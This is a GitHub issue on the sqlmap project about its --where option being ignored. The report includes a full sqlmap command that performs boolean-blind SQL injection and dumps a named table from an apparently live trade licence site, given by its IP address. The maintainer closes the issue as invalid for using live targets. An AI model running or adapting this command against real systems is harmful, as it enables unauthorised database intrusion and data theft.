### ISSUE TITLE
Where clause is not working properly

### ISSUE THREAD

**Issue by sharifulgeo** [sqlmapproject/sqlmap#5245]
**Describe the bug**

I am trying to dump a mssql server table has following columns-
--
RowId (**most probably it is pk**)
TradelicenseID
Created_by
Created_on
TL_OldTLNo
TL_finyrfk
externalfk
updated_by
updated_on
Applicant_Fk

**I am not able to dump a field [RowId] based on time span or threshold.**

**To Reproduce**
Run the below code
 `sqlmap.py -u "http://116.68.194.146/TradeLicense/rpt_TradeLicense_print_ver2.aspx?id=f3a05704-610a-4e67-8212-4f6226d64c37&transactionno=126395476" --risk=3  -T TL_GenerateTradeLicense -C Created_On -D brdnorth_n --level=5 --threads=10 --output-dir=./ --parse-errors -t "traffic.txt" -o -s ./116.68.194.146/session.sqlite -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; de) Opera 9.50" --where= "CAST(Created_on AS date) > CAST('2022-10-14' as date)" -dump --fresh-queries`

You will see `where` clause has no effect at all.

**Expected behavior**
I expected the above code would return only all the entries created on or after 2022-10-14 but it is returning all the entries.

**Screenshots**
<image>https://imgbox.com/WCXgOwYd</image>

**Running environment:**
 - sqlmap version:{1.6.8.1#dev}
 - Installation method [e.g. git]
 - Operating system: Microsoft Windows 10
 - Python version: 3.10.7

**Target details:**
 - DBMS :Microsoft SQL Server 2019
 - SQLi techniques found by sqlmap: `boolean-based blind` as shown in the screenshot
 - WAF/IPS: No
 - Relevant console output [if any]
 - Exception traceback [if any]

**Additional context**

**Comment by stamparm** [comment]
live targets used. closing this down as invalid
